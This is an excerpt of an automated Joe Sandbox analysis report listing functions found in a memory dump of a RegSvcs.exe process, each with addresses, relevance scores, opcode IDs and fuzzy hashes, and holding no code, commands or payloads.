                                                                          • Instruction Fuzzy Hash: 5D4137B2D0062EAADB61DA50CC94FDEB77CBB55714F004596EA08AF140DB709E49CFA4
                                                                          Function 01576B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: #
                                                                          • API String ID: 0-1885708031
                                                                          • Opcode ID: 250a4e1d75d2a1bd2b1dbddbba5d08edffd39b04d290dffc72b455e66a24f004
                                                                          • Instruction ID: 0620cdbf1ba8bb7f9443c737b460231f60f18f62dd72517b08396a494d718656
                                                                          • Opcode Fuzzy Hash: 250a4e1d75d2a1bd2b1dbddbba5d08edffd39b04d290dffc72b455e66a24f004
                                                                          • Instruction Fuzzy Hash: 87311431A00B199AFB22DF6AD855FAE7BACFF45704F144028EA51AF282DB75D805CB50
                                                                          Function 0155CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: BinaryName
                                                                          • API String ID: 0-215506332
                                                                          • Opcode ID: 93d9444a13a6f2cecf167c16a381a9eb98ec951b98c091fe2de3fc195e2e30cd
                                                                          • Instruction ID: 04b032b34dbcc2be799fd614bdddc969ebed5454a1fea3af767b2af56258876a
                                                                          • Opcode Fuzzy Hash: 93d9444a13a6f2cecf167c16a381a9eb98ec951b98c091fe2de3fc195e2e30cd
                                                                          • Instruction Fuzzy Hash: 7D31F736900616AFEB15DB59C865E6FBBB8FF80720F41416AED05AF250D7309E04DBE0
                                                                          Function 0156892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0156895E
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                          • API String ID: 0-702105204
                                                                          • Opcode ID: 61c38a0313cfb066e2d56fa816af0620a28967704d1fb252c97c7815c46479d2
                                                                          • Instruction ID: e540182ff3677d596cea938f95c16f385e6dcd1a2fec329f55b51b60c700b9c4
                                                                          • Opcode Fuzzy Hash: 61c38a0313cfb066e2d56fa816af0620a28967704d1fb252c97c7815c46479d2
                                                                          • Instruction Fuzzy Hash: C401F2322213029FEA316A5AC884B5A7BA9FFD5695B08042DF6411F261CF30A888C7D2
                                                                          Function 01582000 Relevance: .8, Instructions: 757COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0fb46cb029b46f02f78f6841f9098799c4caddcbb100c6377633e070abfeb695
                                                                          • Instruction ID: 4bc901628e74f04b09c6a12ca7418f9b16729ec1be60fc6432b10da76d11f904
                                                                          • Opcode Fuzzy Hash: 0fb46cb029b46f02f78f6841f9098799c4caddcbb100c6377633e070abfeb695
                                                                          • Instruction Fuzzy Hash: B442C5326183419FDB25EF69C890A6FBFE5BF98300F54092DFA86AB250D770D845CB52
                                                                          Function 01578158 Relevance: .6, Instructions: 617COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 670710b035e2041541bf44ec7058ea61341b77cf4c53f056ad88ae56bb02c237
                                                                          • Instruction ID: b2115506e4af0c2f69a3f3ac34a32cc94b5dfc7cd130775774b66d1e6a381454
                                                                          • Opcode Fuzzy Hash: 670710b035e2041541bf44ec7058ea61341b77cf4c53f056ad88ae56bb02c237
                                                                          • Instruction Fuzzy Hash: 18427E71E002199FEB25CF69DC86BADBBF5BF88300F148099E949EB241D7349985CF60
                                                                          Function 014F2840 Relevance: .6, Instructions: 605COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: db1f0156318a66a7e4c847f1d93f7134222196607b1c3b360ef12c025d01d2c8
                                                                          • Instruction ID: f5457f8c339686a1d6c2da7240ccc416d893d9e5c8781f40b95061b66a5b23a0
                                                                          • Opcode Fuzzy Hash: db1f0156318a66a7e4c847f1d93f7134222196607b1c3b360ef12c025d01d2c8
                                                                          • Instruction Fuzzy Hash: F732EE70A007568BEB24CF69C844BBEBBF2BF86308F24451ED5869F385D775A846CB50
                                                                          Function 0158A118 Relevance: .6, Instructions: 591COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7077eb1337b0a73435fe6029e25abdc76da3ae6e5e11e7981ec1cc20be99d1bc
                                                                          • Instruction ID: 800fcd5ed4fa4542f92183567cffdf5587c63748e5d5beb5ed9dfeedf1559da1
                                                                          • Opcode Fuzzy Hash: 7077eb1337b0a73435fe6029e25abdc76da3ae6e5e11e7981ec1cc20be99d1bc
                                                                          • Instruction Fuzzy Hash: 0B22B1706046618BEB25EF2DC05037ABBF1BF44304F08885BD997AF296E775E492DB60
                                                                          Function 014E6A50 Relevance: .5, Instructions: 548COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3cb17642b453660e77e576443d12ca1b66a7c8aaaccc9efc4e5111e92035f82b
                                                                          • Instruction ID: 4f2baffd6639c28215f5cff03bb79d0875b7d8585f9837703362e707e58cf5bc
                                                                          • Opcode Fuzzy Hash: 3cb17642b453660e77e576443d12ca1b66a7c8aaaccc9efc4e5111e92035f82b
                                                                          • Instruction Fuzzy Hash: EC32CD71A00615CFDB25CF68C484BAEBBF1FF58314F15856AE956AB3A1D730E842CB90
                                                                          Function 01504A35 Relevance: .4, Instructions: 423COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                          • Instruction ID: e4a738368f6b0a2d044779c35a432849efeeed24b0683d59dd3c18307ccec496
                                                                          • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                          • Instruction Fuzzy Hash: 5AF16F71E0061A9BDF26CFD9D590BAEBBF5BF48714F048129EA05AF280E774D841CB60
                                                                          Function 0157892B Relevance: .4, Instructions: 386COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a1cc9b044c476230704955efc04f6befa2b43328a9427ac89f69e199b73c757d
                                                                          • Instruction ID: 746875d54c5d4777fd7d8ba1800a9348f487cc481d399004d0806362f61b3f83
                                                                          • Opcode Fuzzy Hash: a1cc9b044c476230704955efc04f6befa2b43328a9427ac89f69e199b73c757d
                                                                          • Instruction Fuzzy Hash: 52D10171A0060A8BDF05CF69D846BFEBBF1BF88314F188169D959AB241E735E905CB60
                                                                          Function 014E65D0 Relevance: .4, Instructions: 383COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7a97fc9c4247df0686bdab13d98b680857a6fbcd0d477af117e9d3d3d493098e
                                                                          • Instruction ID: 830b893b7b47b14c3826543ccdfed164f428bd4a43dee13dba1f1d7dfbcc10ad
                                                                          • Opcode Fuzzy Hash: 7a97fc9c4247df0686bdab13d98b680857a6fbcd0d477af117e9d3d3d493098e
                                                                          • Instruction Fuzzy Hash: 4BE19F71508342CFC715CF28C494A6BBBE0FF99315F068A6EE9998B361D731E905CB92
                                                                          Function 014D8397 Relevance: .4, Instructions: 380COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4102062cbd3641dbcde9f4b9ee81b3f812de3842898c377f3d1c60ca2beaec84
                                                                          • Instruction ID: 67894f39d4dbca4c80f04fba35aab2fff4d7513135906babd6cabd5b1ab54337
                                                                          • Opcode Fuzzy Hash: 4102062cbd3641dbcde9f4b9ee81b3f812de3842898c377f3d1c60ca2beaec84
                                                                          • Instruction Fuzzy Hash: F7D1E0B1A002079BDF14DF69C8A1ABE77B5FFA4304F05422EE916DB2A1E730D951CB60
                                                                          Function 01568243 Relevance: .3, Instructions: 322COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                          • Instruction ID: bbdbf530088368046ce361e754deac8c1731ab941213c11b64f0468bf8475b11
                                                                          • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                          • Instruction Fuzzy Hash: 7FB16074A00705AFDF24DF99C940AAFBBBDFF84304F14446DAA429B794DA34E945CB90
                                                                          Function 014F0535 Relevance: .3, Instructions: 300COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                          • Instruction ID: bbd7a1f2181b920e44fe3293ab04278abf41a834f5059ef61b08a2a2ec61c86b
                                                                          • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                          • Instruction Fuzzy Hash: 75B10631600646AFEB25DB68C854BBEBBF6BF84304F14019EE656DB392D770E941CB50
                                                                          Function 014E83C0 Relevance: .3, Instructions: 281COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bd476199de0e83c2c619ea171e8bd80d92611f5ca362380e20dcbe0ce72bc049
                                                                          • Instruction ID: bf8a745c20f2889e8714358369a37ed90548b65b289d696338bfd037b0f5b0ff
                                                                          • Opcode Fuzzy Hash: bd476199de0e83c2c619ea171e8bd80d92611f5ca362380e20dcbe0ce72bc049
                                                                          • Instruction Fuzzy Hash: 71C159745083418FD764CF19C484BABBBE5BF88308F44496EE9898B3A1DB74E949CF52
                                                                          Function 014DC427 Relevance: .3, Instructions: 280COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3132559d6ca3cebc88650be0739944e81202216faec9526870b15fb09bcf432e
                                                                          • Instruction ID: 9f4a03300bafe603b0607f9860b485519b32e58ab83486e7254431387f9c3db4
                                                                          • Opcode Fuzzy Hash: 3132559d6ca3cebc88650be0739944e81202216faec9526870b15fb09bcf432e
                                                                          • Instruction Fuzzy Hash: EBB17470A002668BDF65CF59C8A0BADB3B1FF94700F4485EED54AEB291DB309D85CB20
                                                                          Function 0150E5E7 Relevance: .3, Instructions: 278COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0652699780d01e62d17610e41cc2a58ecb7d2308771cc376d49d383ed1b163d5
                                                                          • Instruction ID: 4c48e0240a3c40f8a24c8940d63b6b89e9625c86f2ccec7443ae1788d9e88bc7
                                                                          • Opcode Fuzzy Hash: 0652699780d01e62d17610e41cc2a58ecb7d2308771cc376d49d383ed1b163d5
                                                                          • Instruction Fuzzy Hash: DDA10231E002569FEB32DBACD845BAEBBA4FB41718F250526EA10AF2D1D7749D40CBD1
                                                                          Function 01520185 Relevance: .3, Instructions: 276COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2af24ac449e3bf9c1c3fc5c75735ce4f04729f3679796b421505d9f1a866d662
                                                                          • Instruction ID: e64f3e639550910305b7aed7875384c1affa8a836f3fc626c2278b5b9db23590
                                                                          • Opcode Fuzzy Hash: 2af24ac449e3bf9c1c3fc5c75735ce4f04729f3679796b421505d9f1a866d662
                                                                          • Instruction Fuzzy Hash: 1AA1B072B02626DFDB25CF69C590BAEB7A1FF55314F00412AEA059F2C1DB38E815CB90
                                                                          Function 015B4500 Relevance: .3, Instructions: 275COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b328c65b381f4b4e3eaa206bfb94ea29448bc525dd04a44f60b7065feb0af013
                                                                          • Instruction ID: dc328af2e20005e46e1694505548c5f62b6f6ddbeec4e8139e7a3905f0e68e6f
                                                                          • Opcode Fuzzy Hash: b328c65b381f4b4e3eaa206bfb94ea29448bc525dd04a44f60b7065feb0af013
                                                                          • Instruction Fuzzy Hash: EBA1AE72A04652EFC721DF18C980BAAB7E9FF58704F05492DF6869F662D334E901CB91
                                                                          Function 015660E0 Relevance: .3, Instructions: 264COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cc222be9783826562ec61d466dc7472cb30fc2c741a9509787a3eee5834584dd
                                                                          • Instruction ID: 74c5dc8914433e4b9f0d9a461b9cd2fd5d66e4f8ad477615163c116ae37b02e2
                                                                          • Opcode Fuzzy Hash: cc222be9783826562ec61d466dc7472cb30fc2c741a9509787a3eee5834584dd
                                                                          • Instruction Fuzzy Hash: A2916E71E00216AFDB15CFA9D894BAEBBB9BF48710F154169E610AF351D734EA009BE0
                                                                          Function 014FE3F0 Relevance: .3, Instructions: 261COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6dd3a3a910ba316a86b1c379c8eacced36337caf93c7af0ee55f1a8dde6ae78b
                                                                          • Instruction ID: ed9f7ba0130d4cd73d31d0ea3c2912faad15121e8b0ae511a4ee7411a151a5fe
                                                                          • Opcode Fuzzy Hash: 6dd3a3a910ba316a86b1c379c8eacced36337caf93c7af0ee55f1a8dde6ae78b
                                                                          • Instruction Fuzzy Hash: CD910335A00616CBEB24DB9DC444B7EBBA1FB98719F06406EEA05AF3B1E734D902C751
                                                                          Function 01536ACC Relevance: .2, Instructions: 226COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e41838a847db2eb75bae22ffade5278c14de75d00c2459537d0930ccce00f744
                                                                          • Instruction ID: 136ad3912350a2f7af52a4e8abe925ebc9a6a37363eca5f856331262e7f76e49
                                                                          • Opcode Fuzzy Hash: e41838a847db2eb75bae22ffade5278c14de75d00c2459537d0930ccce00f744
                                                                          • Instruction Fuzzy Hash: 8281A871E0061AAFDB18CF69C950ABEBBF9FB88700F04452EE555DB640E734DA40CB54
                                                                          Function 015AAB40 Relevance: .2, Instructions: 222COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                          • Instruction ID: 37959daa3bea2606424723f6c34320b09ed53ce4e430dcbc882cd9f46c53674b
                                                                          • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                          • Instruction Fuzzy Hash: AA816F71A4020A9FDF19CF99C490AAEBBF6BF88310F588569E9169F345D734E901CB90
                                                                          Function 0151E284 Relevance: .2, Instructions: 212COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ae0b31599e6385812d6c25a4f594f763cef855b9fe340488d26454dfb8e4fb3b
                                                                          • Instruction ID: bf6351aa352becc2f8f35d52ff22b137bd25fdbbd57560ac1dc19a5eef42c231
                                                                          • Opcode Fuzzy Hash: ae0b31599e6385812d6c25a4f594f763cef855b9fe340488d26454dfb8e4fb3b
                                                                          • Instruction Fuzzy Hash: 69817371A00609DFEB26CFA9C891BDEBBF9FF88314F104429E955AB254D730AC45CB60
                                                                          Function 014FC640 Relevance: .2, Instructions: 206COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8a588617ff412f8594fc71fece274acb35b65ee57959be41f2d7f1978ee2367d
                                                                          • Instruction ID: 385f790e4e52638cdc426987a0186ad9b2b2dd11dd0f0e5fe78e1d283d6091e2
                                                                          • Opcode Fuzzy Hash: 8a588617ff412f8594fc71fece274acb35b65ee57959be41f2d7f1978ee2367d
                                                                          • Instruction Fuzzy Hash: D071CF75C0562ADBCB258F99C890BBEBBF0FF58714F15411EE992AB360D3309805CB90
                                                                          Function 015947A0 Relevance: .2, Instructions: 202COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bb7ad72e5603c57a239cd7383e394cd9764578c9e973b59c2cfad99227b53f4f
                                                                          • Instruction ID: b8ef59df9d8e6770634b38048a3e97c700d511c44e64e747b07e64e0c36d95b5
                                                                          • Opcode Fuzzy Hash: bb7ad72e5603c57a239cd7383e394cd9764578c9e973b59c2cfad99227b53f4f
                                                                          • Instruction Fuzzy Hash: B5719A70901205EFDF30DF99EA50A9EBBF9FB94300B11815AE620AF268C7758D46DB16
                                                                          Function 014F260B Relevance: .2, Instructions: 201COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1a7177c9586968e65507f54d11f2ec74a5fb5096f3044c773579202b8f83e5b2
                                                                          • Instruction ID: 170c4cd98864a9e3e2f1645cd242ee86bd425ecc463ccd9543d74eececdd0bda
                                                                          • Opcode Fuzzy Hash: 1a7177c9586968e65507f54d11f2ec74a5fb5096f3044c773579202b8f83e5b2
                                                                          • Instruction Fuzzy Hash: 7E71C0356046429FD712DF28C480B2AB7E5FF94314F0485AEE998CB362DB74DC46CB91
                                                                          Function 0156035C Relevance: .2, Instructions: 198COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                          • Instruction ID: 079480516c4b9677859c23ed91ef60e7a8ce149d3edc7c96f60f28c51454924f
                                                                          • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                          • Instruction Fuzzy Hash: D571517190061AEFDB10DFA9C984EDEBBB9FF98710F104569E505EB290DB34EA41CB90
                                                                          Function 015762A0 Relevance: .2, Instructions: 198COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3d2970840fe9db1c4f927f85402602ceb0939eed349fe2bc1854480d77eec41c
                                                                          • Instruction ID: 4f9a2f8cd623ddb0968ca888fc583fc3b44990320264e26c2c5658ff62d7da68
                                                                          • Opcode Fuzzy Hash: 3d2970840fe9db1c4f927f85402602ceb0939eed349fe2bc1854480d77eec41c
                                                                          • Instruction Fuzzy Hash: EE71D432100B02AFE7329F18D896F6ABBE6FB44720F154918E2558F2A1D775E944CB50
                                                                          Function 014E8AA0 Relevance: .2, Instructions: 197COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: da1eb5bb8924bcaa184daa131d9237ec9d76ef4986d685e1a4e83a71161243ab
                                                                          • Instruction ID: c3466ecea6def3f49109277e94524250adaad1d281bba812e4d973beeea39164
                                                                          • Opcode Fuzzy Hash: da1eb5bb8924bcaa184daa131d9237ec9d76ef4986d685e1a4e83a71161243ab
                                                                          • Instruction Fuzzy Hash: D281AE72A092168FDF24CF98D588B6E77F2BF48314F16416EE910AF7A1C7749941CB90
                                                                          Function 0159A250 Relevance: .2, Instructions: 184COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bdd9810333542fc0c571eaf73bbb038251df9d4d95f410a15214c25dea61f056
                                                                          • Instruction ID: 654ff9a422d3ff10800beab677be4c4bea3e9acca6166a7143fc94713f0c57e0
                                                                          • Opcode Fuzzy Hash: bdd9810333542fc0c571eaf73bbb038251df9d4d95f410a15214c25dea61f056
